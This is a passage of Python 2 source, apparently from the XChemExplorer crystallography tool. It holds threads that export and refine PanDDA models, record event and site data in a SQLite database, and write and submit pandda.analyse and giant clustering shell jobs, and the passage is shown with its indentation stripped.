# set timestamp to current timestamp of file and set RefinementOutcome to '2-pandda...'
if samples_to_export != {}:
select_dir_string=''
select_dir_string_new_pannda=' '
for sample in samples_to_export:
self.Logfile.insert('changing directory to ' + os.path.join(self.initial_model_directory,sample))
os.chdir(os.path.join(self.initial_model_directory,sample))
self.Logfile.insert(sample + ': copying ' + os.path.join(self.panddas_directory,'processed_datasets',sample,'modelled_structures',sample+'-pandda-model.pdb'))
os.system('/bin/cp %s .' %os.path.join(self.panddas_directory,'processed_datasets',sample,'modelled_structures',sample+'-pandda-model.pdb'))
db_dict= {'RefinementOutcome': '2 - PANDDA model', 'DatePanDDAModelCreated': samples_to_export[sample]}
for old_event_map in glob.glob('*-BDC_*.ccp4'):
if not os.path.isdir('old_event_maps'):
os.mkdir('old_event_maps')
self.Logfile.warning(sample + ': moving ' + old_event_map + ' to old_event_maps folder')
os.system('/bin/mv %s old_event_maps' %old_event_map)
for event_map in glob.glob(os.path.join(self.panddas_directory,'processed_datasets',sample,'*-BDC_*.ccp4')):
self.Logfile.insert(sample + ': copying ' + event_map)
os.system('/bin/cp %s .' %event_map)
select_dir_string+="select_dir={0!s} ".format(sample)
select_dir_string_new_pannda+='{0!s} '.format(sample)
self.Logfile.insert('updating database for '+sample+' setting time model was created to '+db_dict['DatePanDDAModelCreated']+' and RefinementOutcome to '+db_dict['RefinementOutcome'])
self.db.update_data_source(sample,db_dict)
return samples_to_export
class run_pandda_export(QtCore.QThread):
def __init__(self,panddas_directory,datasource,initial_model_directory,xce_logfile,update_datasource_only,which_models,pandda_params):
QtCore.QThread.__init__(self)
self.panddas_directory=panddas_directory
self.datasource=datasource
self.initial_model_directory=initial_model_directory
self.db=XChemDB.data_source(self.datasource)
self.db.create_missing_columns()
self.db_list=self.db.get_empty_db_dict()
self.external_software=XChemUtils.external_software(xce_logfile).check()
self.xce_logfile=xce_logfile
self.Logfile=XChemLog.updateLog(xce_logfile)
self.update_datasource_only=update_datasource_only
self.which_models=which_models
self.already_exported_models=[]
self.pandda_analyse_data_table = pandda_params['pandda_table']
self.RefmacParams={ 'HKLIN': '', 'HKLOUT': '',
'XYZIN': '', 'XYZOUT': '',
'LIBIN': '', 'LIBOUT': '',
'TLSIN': '', 'TLSOUT': '',
'TLSADD': '',
'NCYCLES': '10',
'MATRIX_WEIGHT': 'AUTO',
'BREF': ' bref ISOT\n',
'TLS': '',
'NCS': '',
'TWIN': '' }
def run(self):
# v1.3.8.2 - removed option to update database only
# if not self.update_datasource_only:
samples_to_export=self.export_models()
self.import_samples_into_datasouce(samples_to_export)
# if not self.update_datasource_only:
self.refine_exported_models(samples_to_export)
def refine_exported_models(self,samples_to_export):
self.Logfile.insert('will try to refine the following crystals:')
for xtal in samples_to_export: self.Logfile.insert(xtal)
# sample_list=self.db.execute_statement("select CrystalName,CompoundCode from mainTable where RefinementOutcome='2 - PANDDA model';")
# for item in sample_list:
# xtal=str(item[0])
for xtal in sorted(samples_to_export):
self.Logfile.insert('%s: getting compound code from database' %xtal)
query=self.db.execute_statement("select CompoundCode from mainTable where CrystalName='%s';" %xtal)
compoundID=str(query[0][0])
self.Logfile.insert('%s: compounds code = %s' %(xtal,compoundID))
# compoundID=str(item[1])
if os.path.isfile(os.path.join(self.initial_model_directory,xtal,xtal+'.free.mtz')):
if os.path.isfile(os.path.join(self.initial_model_directory,xtal,xtal+'-ensemble-model.pdb')):
self.Logfile.insert('running inital refinement on PANDDA model of '+xtal)
Serial=XChemRefine.GetSerial(self.initial_model_directory,xtal)
#######################################################
if not os.path.isdir(os.path.join(self.initial_model_directory,xtal,'cootOut')):
os.mkdir(os.path.join(self.initial_model_directory,xtal,'cootOut'))
# create folder for new refinement cycle
if os.path.isdir(os.path.join(self.initial_model_directory,xtal,'cootOut','Refine_'+str(Serial))):
os.chdir(os.path.join(self.initial_model_directory,xtal,'cootOut','Refine_'+str(Serial)))
try:
os.system('/bin/rm *-ensemble-model.pdb *restraints*')
except:
self.Logfile.error("Restraint files didn't exist to remove. Will try to continue")
else:
os.mkdir(os.path.join(self.initial_model_directory,xtal,'cootOut','Refine_'+str(Serial)))
os.chdir(os.path.join(self.initial_model_directory,xtal,'cootOut','Refine_'+str(Serial)))
Refine=XChemRefine.panddaRefine(self.initial_model_directory,xtal,compoundID,self.datasource)
os.symlink(os.path.join(self.initial_model_directory,xtal,xtal+'-ensemble-model.pdb'),xtal+'-ensemble-model.pdb')
Refine.RunQuickRefine(Serial,self.RefmacParams,self.external_software,self.xce_logfile,'pandda_refmac',None)
# elif xtal in os.path.join(self.panddas_directory,'processed_datasets',xtal,'modelled_structures',
# '{}-pandda-model.pdb'.format(xtal)):
# self.Logfile.insert('{}: cannot start refinement because {}'.format(xtal,xtal) +
# ' does not have a modelled structure. Check whether you expect this dataset to ' +
# ' have a modelled structure, compare pandda.inspect and datasource,'
# ' then tell XCHEMBB ')
else:
self.Logfile.error('%s: cannot find %s-ensemble-model.pdb; cannot start refinement...' %(xtal,xtal))
self.Logfile.error('Please check terminal window for any PanDDA related tracebacks')
elif xtal in samples_to_export and not os.path.isfile(
os.path.join(self.initial_model_directory, xtal, xtal + '.free.mtz')):
self.Logfile.error('%s: cannot start refinement because %s.free.mtz is missing in %s' % (
xtal, xtal, os.path.join(self.initial_model_directory, xtal)))
else:
self.Logfile.insert('%s: nothing to refine' % (xtal))
def import_samples_into_datasouce(self,samples_to_export):
# first make a note of all the datasets which were used in pandda directory
os.chdir(os.path.join(self.panddas_directory,'processed_datasets'))
for xtal in glob.glob('*'):
self.db.execute_statement("update mainTable set DimplePANDDAwasRun = 'True',DimplePANDDAreject = 'False',DimplePANDDApath='{0!s}' where CrystalName is '{1!s}'".format(self.panddas_directory, xtal))
# do the same as before, but look for rejected datasets
try:
os.chdir(os.path.join(self.panddas_directory,'rejected_datasets'))
for xtal in glob.glob('*'):
self.db.execute_statement("update mainTable set DimplePANDDAwasRun = 'True',DimplePANDDAreject = 'True',DimplePANDDApath='{0!s}',DimplePANDDAhit = 'False' where CrystalName is '{1!s}'".format(self.panddas_directory, xtal))
except OSError:
pass
site_list = []
pandda_hit_list=[]
with open(os.path.join(self.panddas_directory,'analyses','pandda_inspect_sites.csv'),'rb') as csv_import:
csv_dict = csv.DictReader(csv_import)
self.Logfile.insert('reding pandda_inspect_sites.csv')
for i,line in enumerate(csv_dict):
self.Logfile.insert(str(line).replace('\n','').replace('\r',''))
site_index=line['site_idx']
name=line['Name'].replace("'","")
comment=line['Comment']
site_list.append([site_index,name,comment])
self.Logfile.insert('add to site_list_:' + str([site_index,name,comment]))
progress_step=1
for i,line in enumerate(open(os.path.join(self.panddas_directory,'analyses','pandda_inspect_events.csv'))):
n_lines=i
if n_lines != 0:
progress_step=100/float(n_lines)
else:
progress_step=0
progress=0
self.emit(QtCore.SIGNAL('update_progress_bar'), progress)
self.Logfile.insert('reading '+os.path.join(self.panddas_directory,'analyses','pandda_inspect_events.csv'))
with open(os.path.join(self.panddas_directory,'analyses','pandda_inspect_events.csv'),'rb') as csv_import:
csv_dict = csv.DictReader(csv_import)
for i,line in enumerate(csv_dict):
db_dict={}
sampleID=line['dtag']
if sampleID not in samples_to_export:
self.Logfile.warning('%s: not to be exported; will not add to panddaTable...' %sampleID)
continue
if sampleID not in pandda_hit_list:
pandda_hit_list.append(sampleID)
site_index=str(line['site_idx']).replace('.0','')
event_index=str(line['event_idx']).replace('.0','')
self.Logfile.insert(str(line))
self.Logfile.insert('reading {0!s} -> site {1!s} -> event {2!s}'.format(sampleID, site_index, event_index))
for entry in site_list:
if entry[0]==site_index:
site_name=entry[1]
site_comment=entry[2]
break
# check if EVENT map exists in project directory
event_map=''
for file in glob.glob(os.path.join(self.initial_model_directory,sampleID,'*ccp4')):
filename=file[file.rfind('/')+1:]
if filename.startswith(sampleID+'-event_'+event_index) and filename.endswith('map.native.ccp4'):
event_map=file
self.Logfile.insert('found respective event maps in {0!s}: {1!s}'.format(self.initial_model_directory, event_map))
break
# initial pandda model and mtz file
pandda_model=''
for file in glob.glob(os.path.join(self.initial_model_directory,sampleID,'*pdb')):
filename=file[file.rfind('/')+1:]
if filename.endswith('-ensemble-model.pdb'):
pandda_model=file
if sampleID not in self.already_exported_models:
self.already_exported_models.append(sampleID)
break
inital_mtz=''
for file in glob.glob(os.path.join(self.initial_model_directory,sampleID,'*mtz')):
filename=file[file.rfind('/')+1:]
if filename.endswith('pandda-input.mtz'):
inital_mtz=file
break
db_dict['CrystalName'] = sampleID
db_dict['PANDDApath'] = self.panddas_directory
db_dict['PANDDA_site_index'] = site_index
db_dict['PANDDA_site_name'] = site_name
db_dict['PANDDA_site_comment'] = site_comment
db_dict['PANDDA_site_event_index'] = event_index
db_dict['PANDDA_site_event_comment'] = line['Comment'].replace("'","")
db_dict['PANDDA_site_confidence'] = line['Ligand Confidence']
db_dict['PANDDA_site_InspectConfidence'] = line['Ligand Confidence']
db_dict['PANDDA_site_ligand_placed'] = line['Ligand Placed']
db_dict['PANDDA_site_viewed'] = line['Viewed']
db_dict['PANDDA_site_interesting'] = line['Interesting']
db_dict['PANDDA_site_z_peak'] = line['z_peak']
db_dict['PANDDA_site_x'] = line['x']
db_dict['PANDDA_site_y'] = line['y']
db_dict['PANDDA_site_z'] = line['z']
db_dict['PANDDA_site_ligand_id'] = ''
db_dict['PANDDA_site_event_map'] = event_map
db_dict['PANDDA_site_initial_model'] = pandda_model
db_dict['PANDDA_site_initial_mtz'] = inital_mtz
db_dict['PANDDA_site_spider_plot'] = ''
# find apo structures which were used
# XXX missing XXX
self.db.update_insert_site_event_panddaTable(sampleID,db_dict)
# this is necessary, otherwise RefinementOutcome will be reset for samples that are actually already in refinement
self.db.execute_statement("update panddaTable set RefinementOutcome = '2 - PANDDA model' where CrystalName is '{0!s}' and RefinementOutcome is null".format(sampleID))
self.db.execute_statement("update mainTable set RefinementOutcome = '2 - PANDDA model' where CrystalName is '{0!s}' and (RefinementOutcome is null or RefinementOutcome is '1 - Analysis Pending')".format(sampleID))
self.db.execute_statement("update mainTable set DimplePANDDAhit = 'True' where CrystalName is '{0!s}'".format(sampleID))
progress += progress_step
self.emit(QtCore.SIGNAL('update_progress_bar'), progress)
self.Logfile.insert('done reading pandda_inspect_sites.csv')
# finally find all samples which do not have a pandda hit
os.chdir(os.path.join(self.panddas_directory,'processed_datasets'))
self.Logfile.insert('check which datasets are not interesting')
# DimplePANDDAhit
# for xtal in glob.glob('*'):
# if xtal not in pandda_hit_list:
# self.Logfile.insert(xtal+': not in interesting_datasets; updating database...')
# self.db.execute_statement("update mainTable set DimplePANDDAhit = 'False' where CrystalName is '{0!s}'".format(xtal))
def export_models(self):
self.Logfile.insert('finding out which PanDDA models need to be exported')
# first find which samples are in interesting datasets and have a model
# and determine the timestamp
fileModelsDict={}
queryModels=''
for model in glob.glob(os.path.join(self.panddas_directory,'processed_datasets','*','modelled_structures','*-pandda-model.pdb')):
sample=model[model.rfind('/')+1:].replace('-pandda-model.pdb','')
timestamp=datetime.fromtimestamp(os.path.getmtime(model)).strftime('%Y-%m-%d %H:%M:%S')
self.Logfile.insert(sample+'-pandda-model.pdb was created on '+str(timestamp))
queryModels+="'"+sample+"',"
fileModelsDict[sample]=timestamp
# now get these models from the database and compare the datestamps
# Note: only get the models that underwent some form of refinement,
# because only if the model was updated in pandda.inspect will it be exported and refined
dbModelsDict={}
if queryModels != '':
dbEntries=self.db.execute_statement("select CrystalName,DatePanDDAModelCreated from mainTable where CrystalName in ("+queryModels[:-1]+") and (RefinementOutcome like '3%' or RefinementOutcome like '4%' or RefinementOutcome like '5%')")
for item in dbEntries:
xtal=str(item[0])
timestamp=str(item[1])
dbModelsDict[xtal]=timestamp
self.Logfile.insert('PanDDA model for '+xtal+' is in database and was created on '+str(timestamp))
# compare timestamps and only export the ones where the timestamp of the file is newer than the one in the DB
samples_to_export={}
self.Logfile.insert('checking which PanDDA models were newly created or updated')
if self.which_models=='all':
self.Logfile.insert('Note: you chose to export ALL available PanDDA!')
for sample in fileModelsDict:
if self.which_models=='all':
self.Logfile.insert('exporting '+sample)
samples_to_export[sample]=fileModelsDict[sample]
elif self.which_models == 'selected':
for i in range(0, self.pandda_analyse_data_table.rowCount()):
if str(self.pandda_analyse_data_table.item(i, 0).text()) == sample:
if self.pandda_analyse_data_table.cellWidget(i, 1).isChecked():
self.Logfile.insert('Dataset selected by user -> exporting '+sample)
samples_to_export[sample]=fileModelsDict[sample]
break
else:
if sample in dbModelsDict:
try:
difference=(datetime.strptime(fileModelsDict[sample],'%Y-%m-%d %H:%M:%S') - datetime.strptime(dbModelsDict[sample],'%Y-%m-%d %H:%M:%S') )
if difference.seconds != 0:
self.Logfile.insert('exporting '+sample+' -> was already refined, but newer PanDDA model available')
samples_to_export[sample]=fileModelsDict[sample]
except ValueError:
# this will be raised if timestamp is not properly formatted;
# which will usually be the case when respective field in database is blank
# these are hopefully legacy cases which are from before this extensive check was introduced (13/01/2017)
advice = ( 'The pandda model of '+xtal+' was changed, but it was already refined! '
'This is most likely because this was done with an older version of XCE. '
'If you really want to export and refine this model, you need to open the database '
'with DBbroweser (sqlitebrowser.org); then change the RefinementOutcome field '
'of the respective sample to "2 - PANDDA model", save the database and repeat the export prodedure.' )
self.Logfile.insert(advice)
else:
self.Logfile.insert('exporting '+sample+' -> first time to be exported and refined')
samples_to_export[sample]=fileModelsDict[sample]
# update the DB:
# set timestamp to current timestamp of file and set RefinementOutcome to '2-pandda...'
if samples_to_export != {}:
select_dir_string=''
select_dir_string_new_pannda=' '
for sample in samples_to_export:
db_dict= {'RefinementOutcome': '2 - PANDDA model', 'DatePanDDAModelCreated': samples_to_export[sample]}
select_dir_string+="select_dir={0!s} ".format(sample)
select_dir_string_new_pannda+='{0!s} '.format(sample)
self.Logfile.insert('updating database for '+sample+' setting time model was created to '+db_dict['DatePanDDAModelCreated']+' and RefinementOutcome to '+db_dict['RefinementOutcome'])
self.db.update_data_source(sample,db_dict)
if os.path.isdir(os.path.join(self.panddas_directory,'rejected_datasets')):
Cmds = (
'pandda.export'
' pandda_dir=%s' %self.panddas_directory+
' export_dir={0!s}'.format(self.initial_model_directory)+
' {0!s}'.format(select_dir_string)+
' export_ligands=False'
' generate_occupancy_groupings=True\n'
)
else:
Cmds = (
'source /dls/science/groups/i04-1/software/pandda-update/ccp4/ccp4-7.0/bin/ccp4.setup-sh\n'
# 'source '+os.path.join(os.getenv('XChemExplorer_DIR'),'setup-scripts','pandda.setup-sh')+'\n'
'pandda.export'
' pandda_dir=%s' %self.panddas_directory+
' export_dir={0!s}'.format(self.initial_model_directory)+
' {0!s}'.format(select_dir_string_new_pannda)+
' generate_restraints=True\n'
)
self.Logfile.insert('running pandda.export with the following settings:\n'+Cmds)
os.system(Cmds)
return samples_to_export
class run_pandda_analyse(QtCore.QThread):
def __init__(self,pandda_params,xce_logfile,datasource):
QtCore.QThread.__init__(self)
self.data_directory=pandda_params['data_dir']
self.panddas_directory=pandda_params['out_dir']
self.submit_mode=pandda_params['submit_mode']
self.pandda_analyse_data_table = pandda_params['pandda_table']
self.nproc=pandda_params['nproc']
self.min_build_datasets=pandda_params['min_build_datasets']
self.pdb_style=pandda_params['pdb_style']
self.mtz_style=pandda_params['mtz_style']
self.sort_event=pandda_params['sort_event']
self.number_of_datasets=pandda_params['N_datasets']
self.max_new_datasets=pandda_params['max_new_datasets']
self.grid_spacing=pandda_params['grid_spacing']
self.reference_dir=pandda_params['reference_dir']
self.filter_pdb=os.path.join(self.reference_dir,pandda_params['filter_pdb'])
self.wilson_scaling = pandda_params['perform_diffraction_data_scaling']
self.Logfile=XChemLog.updateLog(xce_logfile)
self.datasource=datasource
self.db=XChemDB.data_source(datasource)
self.appendix=pandda_params['appendix']
self.write_mean_maps=pandda_params['write_mean_map']
self.calc_map_by = pandda_params['average_map']
self.select_ground_state_model=''
projectDir = self.data_directory.replace('/*', '')
self.make_ligand_links='$CCP4/bin/ccp4-python %s %s %s\n' %(os.path.join(os.getenv('XChemExplorer_DIR'),
'helpers',
'make_ligand_links_after_pandda.py')
,projectDir,self.panddas_directory)
self.use_remote = pandda_params['use_remote']
self.remote_string = pandda_params['remote_string']
if self.appendix != '':
self.panddas_directory=os.path.join(self.reference_dir,'pandda_'+self.appendix)
if os.path.isdir(self.panddas_directory):
os.system('/bin/rm -fr %s' %self.panddas_directory)
os.mkdir(self.panddas_directory)
if self.data_directory.startswith('/dls'):
self.select_ground_state_model = 'module load ccp4\n'
self.select_ground_state_model +='$CCP4/bin/ccp4-python %s %s\n' %(os.path.join(os.getenv('XChemExplorer_DIR'),'helpers','select_ground_state_dataset.py'),self.panddas_directory)
self.make_ligand_links=''
def run(self):
# print self.reference_dir
# print self.filter_pdb
# how to run pandda.analyse on large datasets
#
# 1) Run the normal pandda command, with the new setting, e.g.
# pandda.analyse data_dirs=... max_new_datasets=500
# This will do the analysis on the first 500 datasets and build the statistical maps - just as normal.
#
# 2) Run pandda with the same command:
# pandda.analyse data_dirs=... max_new_datasets=500
# This will add 500 new datasets, and process them using the existing statistical maps
# (this will be quicker than the original analysis). It will then merge the results of the two analyses.
#
# 3) Repeat 2) until you don't add any "new" datasets. Then you can build the models as normal.
number_of_cyles=int(self.number_of_datasets)/int(self.max_new_datasets)
if int(self.number_of_datasets) % int(self.max_new_datasets) != 0: # modulo gives remainder after integer division
number_of_cyles+=1
self.Logfile.insert('will run %s rounds of pandda.analyse' %str(number_of_cyles))
if os.path.isfile(os.path.join(self.panddas_directory,'pandda.running')):
self.Logfile.insert('it looks as if a pandda.analyse job is currently running in: '+self.panddas_directory)
msg = ( 'there are three possibilities:\n'
'1.) choose another PANDDA directory\n'
'2.) - check if the job is really running either on the cluster (qstat) or on your local machine\n'
' - if so, be patient and wait until the job has finished\n'
'3.) same as 2., but instead of waiting, kill the job and remove at least the pandda.running file\n'
' (or all the contents in the directory if you want to start from scratch)\n' )
self.Logfile.insert(msg)
return None
else:
# if os.getenv('SHELL') == '/bin/tcsh' or os.getenv('SHELL') == '/bin/csh':
# source_file=os.path.join(os.getenv('XChemExplorer_DIR'),'setup-scripts','pandda.setup-csh\n')
# elif os.getenv('SHELL') == '/bin/bash' or self.use_remote:
# source_file='export XChemExplorer_DIR="'+os.getenv('XChemExplorer_DIR')+'"\n'
# source_file+='source %s\n' %os.path.join(os.getenv('XChemExplorer_DIR'),'setup-scripts','pandda.setup-sh\n')
# else:
# source_file=''
# v1.2.1 - pandda.setup files should be obsolete now that pandda is part of ccp4
# 08/10/2020 - pandda v0.2.12 installation at DLS is obsolete
# source_file='source /dls/science/groups/i04-1/software/pandda_0.2.12/ccp4/ccp4-7.0/bin/ccp4.setup-sh\n'
source_file = ''
source_file += 'export XChemExplorer_DIR="' + os.getenv('XChemExplorer_DIR') + '"\n'
if os.path.isfile(self.filter_pdb + '.pdb'):
print('filter pdb located')
filter_pdb=' filter.pdb='+self.filter_pdb+'.pdb'
print('will use ' + filter_pdb + 'as a filter for pandda.analyse')
else:
if self.use_remote:
stat_command = self.remote_string.replace("qsub'", str('stat ' + self.filter_pdb + "'"))
output = subprocess.Popen(stat_command, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
out, err = output.communicate()
print out
if 'cannot stat' in out:
filter_pdb = ''
else:
filter_pdb = ' filter.pdb=' + self.filter_pdb + '.pdb'
else:
filter_pdb=''
os.chdir(self.panddas_directory)
# note: copied latest pandda.setup-sh from XCE2 installation (08/08/2017)
dls = ''
if self.data_directory.startswith('/dls'):
dls = (
source_file +
'\n'
'module load pymol/1.8.2.0\n'
'\n'
'module load ccp4/7.0.072\n'
'\n'
)
Cmds = (
'#!'+os.getenv('SHELL')+'\n' +
'\n' +
dls +
'cd ' + self.panddas_directory + '\n' +
'\n'
)
ignore = []
char = []
zmap = []
for i in range(0, self.pandda_analyse_data_table.rowCount()):
ignore_all_checkbox = self.pandda_analyse_data_table.cellWidget(i, 7)
ignore_characterisation_checkbox = self.pandda_analyse_data_table.cellWidget(i, 8)
ignore_zmap_checkbox = self.pandda_analyse_data_table.cellWidget(i, 9)
if ignore_all_checkbox.isChecked():
ignore.append(str(self.pandda_analyse_data_table.item(i, 0).text()))
if ignore_characterisation_checkbox.isChecked():
char.append(str(self.pandda_analyse_data_table.item(i, 0).text()))
if ignore_zmap_checkbox.isChecked():
zmap.append(str(self.pandda_analyse_data_table.item(i, 0).text()))
print ignore
def append_to_ignore_string(datasets_list, append_string):
if len(datasets_list)==0:
append_string = ''
for i in range(0, len(datasets_list)):
if i < len(datasets_list)-1:
append_string += str(datasets_list[i] + ',')
else:
append_string += str(datasets_list[i] +'"')
print(append_string)
return append_string
ignore_string = 'ignore_datasets="'
ignore_string = append_to_ignore_string(ignore, ignore_string)
char_string = 'exclude_from_characterisation="'
char_string = append_to_ignore_string(char, char_string)
zmap_string = 'exclude_from_z_map_analysis="'
zmap_string = append_to_ignore_string(zmap, zmap_string)
for i in range(number_of_cyles):
Cmds += (
'pandda.analyse '+
' data_dirs="'+self.data_directory.replace('/*','')+'/*"'+
' out_dir="'+self.panddas_directory+'"'
' min_build_datasets='+self.min_build_datasets+
' max_new_datasets='+self.max_new_datasets+
' grid_spacing='+self.grid_spacing+
' cpus='+self.nproc+
' events.order_by='+self.sort_event+
filter_pdb+
' pdb_style='+self.pdb_style+
' mtz_style='+self.mtz_style+
' lig_style=/compound/*.cif'+
' apply_b_factor_scaling='+self.wilson_scaling+
' write_average_map='+self.write_mean_maps +
' average_map=' + self.calc_map_by +
' ' +
ignore_string +' '+
char_string +' '+
zmap_string +' '+
'\n'
)
Cmds += self.select_ground_state_model
Cmds += self.make_ligand_links
Cmds += '\n'
data_dir_string = self.data_directory.replace('/*', '')
Cmds += str(
'find ' + data_dir_string +
'/*/compound -name "*.cif" | while read line; do echo ${line//"' +
data_dir_string + '"/"' + self.panddas_directory +
'/processed_datasets/"}| while read line2; do cp $line ${line2//compound/ligand_files} > /dev/null 2>&1; '
'done; done;')
Cmds += '\n'
Cmds += str(
'find ' + data_dir_string +
'/*/compound -name "*.pdb" | while read line; do echo ${line//"' +
data_dir_string + '"/"' + self.panddas_directory +
'/processed_datasets/"}| while read line2; do cp $line ${line2//compound/ligand_files} > /dev/null 2>&1; '
'done; done;')
self.Logfile.insert('running pandda.analyse with the following command:\n'+Cmds)
f = open('pandda.sh','w')
f.write(Cmds)
f.close()
# #>>> for testing
# self.submit_mode='local machine'
self.Logfile.insert('trying to run pandda.analyse on ' + str(self.submit_mode))
if self.submit_mode=='local machine':
self.Logfile.insert('running PANDDA on local machine')
os.system('chmod +x pandda.sh')
os.system('./pandda.sh &')
elif self.use_remote:
# handles remote submission of pandda.analyse jobs
submission_string = self.remote_string.replace("qsub'",
str('cd ' +
self.panddas_directory +
'; ' +
"qsub -P labxchem -q medium.q -N pandda 5 -l exclusive,m_mem_free=100G pandda.sh'"))
os.system(submission_string)
self.Logfile.insert(str('running PANDDA remotely, using: ' + submission_string))
else:
self.Logfile.insert('running PANDDA on cluster, using qsub...')
os.system('qsub -P labxchem -q medium.q -N pandda -l exclusive,m_mem_free=100G pandda.sh')
self.emit(QtCore.SIGNAL('datasource_menu_reload_samples'))
class giant_cluster_datasets(QtCore.QThread):
def __init__(self,initial_model_directory,pandda_params,xce_logfile,datasource,):
QtCore.QThread.__init__(self)
self.panddas_directory=pandda_params['out_dir']
self.pdb_style=pandda_params['pdb_style']
self.mtz_style=pandda_params['mtz_style']
self.Logfile=XChemLog.updateLog(xce_logfile)
self.initial_model_directory=initial_model_directory
self.db=XChemDB.data_source(datasource)
def run(self):
self.emit(QtCore.SIGNAL('update_progress_bar'), 0)
if self.pdb_style.replace(' ','') == '':
self.Logfile.insert('PDB style is not set in pandda.analyse!')
self.Logfile.insert('cannot start pandda.analyse')
self.emit(QtCore.SIGNAL('update_status_bar(QString)'), 'PDB style is not set in pandda.analyse!')
return None
if self.mtz_style.replace(' ','') == '':
self.Logfile.insert('MTZ style is not set in pandda.analyse!')
self.Logfile.insert('cannot start pandda.analyse')
self.emit(QtCore.SIGNAL('update_status_bar(QString)'), 'MTZ style is not set in pandda.analyse!')
return None
# 1.) prepare output directory
os.chdir(self.panddas_directory)
if os.path.isdir('cluster_analysis'):
self.Logfile.insert('removing old cluster_analysis directory in {0!s}'.format(self.panddas_directory))
self.emit(QtCore.SIGNAL('update_status_bar(QString)'), 'removing old cluster_analysis directory in {0!s}'.format(self.panddas_directory))
os.system('/bin/rm -fr cluster_analysis 2> /dev/null')
self.Logfile.insert('creating cluster_analysis directory in {0!s}'.format(self.panddas_directory))
self.emit(QtCore.SIGNAL('update_status_bar(QString)'), 'creating cluster_analysis directory in {0!s}'.format(self.panddas_directory))
os.mkdir('cluster_analysis')
self.emit(QtCore.SIGNAL('update_progress_bar'), 10)
# 2.) go through project directory and make sure that all pdb files really exist
# broken links derail the giant.cluster_mtzs_and_pdbs script
self.Logfile.insert('cleaning up broken links of {0!s} and {1!s} in {2!s}'.format(self.pdb_style, self.mtz_style, self.initial_model_directory))
self.emit(QtCore.SIGNAL('update_status_bar(QString)'), 'cleaning up broken links of {0!s} and {1!s} in {2!s}'.format(self.pdb_style, self.mtz_style, self.initial_model_directory))
os.chdir(self.initial_model_directory)
for xtal in glob.glob('*'):
if not os.path.isfile(os.path.join(xtal,self.pdb_style)):
self.Logfile.insert('missing {0!s} and {1!s} for {2!s}'.format(self.pdb_style, self.mtz_style, xtal))
os.system('/bin/rm {0!s}/{1!s} 2> /dev/null'.format(xtal, self.pdb_style))
os.system('/bin/rm {0!s}/{1!s} 2> /dev/null'.format(xtal, self.mtz_style))
self.emit(QtCore.SIGNAL('update_progress_bar'), 20)
# 3.) giant.cluster_mtzs_and_pdbs
self.Logfile.insert("running giant.cluster_mtzs_and_pdbs {0!s}/*/{1!s} pdb_regex='{2!s}/(.*)/{3!s}' out_dir='{4!s}/cluster_analysis'".format(self.initial_model_directory, self.pdb_style, self.initial_model_directory, self.pdb_style, self.panddas_directory))
self.emit(QtCore.SIGNAL('update_status_bar(QString)'), 'running giant.cluster_mtzs_and_pdbs')
if os.getenv('SHELL') == '/bin/tcsh' or os.getenv('SHELL') == '/bin/csh':
source_file=os.path.join(os.getenv('XChemExplorer_DIR'),'setup-scripts','pandda.setup-csh')
elif os.getenv('SHELL') == '/bin/bash':
source_file=os.path.join(os.getenv('XChemExplorer_DIR'),'setup-scripts','pandda.setup-sh')
else:
source_file=''
Cmds = (
'#!'+os.getenv('SHELL')+'\n'
'unset PYTHONPATH\n'
'source '+source_file+'\n'
"giant.datasets.cluster %s/*/%s pdb_regex='%s/(.*)/%s' out_dir='%s/cluster_analysis'" %(self.initial_model_directory,self.pdb_style,self.initial_model_directory,self.pdb_style,self.panddas_directory)
)
# os.system("giant.cluster_mtzs_and_pdbs %s/*/%s pdb_regex='%s/(.*)/%s' out_dir='%s/cluster_analysis'" %(self.initial_model_directory,self.pdb_style,self.initial_model_directory,self.pdb_style,self.panddas_directory))
os.system(Cmds)
self.emit(QtCore.SIGNAL('update_progress_bar'), 80)
# 4.) analyse output
self.Logfile.insert('parsing {0!s}/cluster_analysis'.format(self.panddas_directory))
self.emit(QtCore.SIGNAL('update_status_bar(QString)'), 'parsing {0!s}/cluster_analysis'.format(self.panddas_directory))
os.chdir('{0!s}/cluster_analysis'.format(self.panddas_directory))
cluster_dict={}
for out_dir in sorted(glob.glob('*')):
if os.path.isdir(out_dir):
cluster_dict[out_dir]=[]
for folder in glob.glob(os.path.join(out_dir,'pdbs','*')):
xtal=folder[folder.rfind('/')+1:]
cluster_dict[out_dir].append(xtal)
self.emit(QtCore.SIGNAL('update_progress_bar'), 90)
# 5.) update datasource
self.Logfile.insert('updating datasource with results from giant.cluster_mtzs_and_pdbs')
if cluster_dict != {}:
for key in cluster_dict:
for xtal in cluster_dict[key]:
db_dict= {'CrystalFormName': key}
self.db.update_data_source(xtal,db_dict)
# 6.) finish
self.emit(QtCore.SIGNAL('update_progress_bar'), 100)
self.Logfile.insert('finished giant.cluster_mtzs_and_pdbs')
self.emit(QtCore.SIGNAL('datasource_menu_reload_samples'))
class check_if_pandda_can_run:
# reasons why pandda cannot be run
# - there is currently a job running in the pandda directory
# - min datasets available is too low
# - required input paramters are not complete
# - map amplitude and phase labels don't exist
def __init__(self,pandda_params,xce_logfile,datasource):
self.data_directory=pandda_params['data_dir']
self.panddas_directory=pandda_params['out_dir']
self.min_build_datasets=pandda_params['min_build_datasets']
self.pdb_style=pandda_params['pdb_style']
self.mtz_style=pandda_params['mtz_style']
self.input_dir_structure=pandda_params['pandda_dir_structure']
self.problem_found=False
self.error_code=-1
self.Logfile=XChemLog.updateLog(xce_logfile)
self.db=XChemDB.data_source(datasource)
def number_of_available_datasets(self):
counter=0
for file in glob.glob(os.path.join(self.input_dir_structure,self.pdb_style)):
if os.path.isfile(file):
counter+=1
self.Logfile.insert('pandda.analyse: found {0!s} useable datasets'.format(counter))
return counter
def get_first_dataset_in_project_directory(self):
first_dataset=''
for file in glob.glob(os.path.join(self.input_dir_structure,self.pdb_style)):
if os.path.isfile(file):
first_dataset=file
break
return first_dataset
def compare_number_of_atoms_in_reference_vs_all_datasets(self,refData,dataset_list):
mismatched_datasets=[]
pdbtools=XChemUtils.pdbtools(refData)
refPDB=refData[refData.rfind('/')+1:]
refPDBlist=pdbtools.get_init_pdb_as_list()
n_atom_ref=len(refPDBlist)
for n_datasets,dataset in enumerate(dataset_list):
if os.path.isfile(os.path.join(self.data_directory.replace('*',''),dataset,self.pdb_style)):
n_atom=len(pdbtools.get_pdb_as_list(os.path.join(self.data_directory.replace('*',''),dataset,self.pdb_style)))
if n_atom_ref == n_atom:
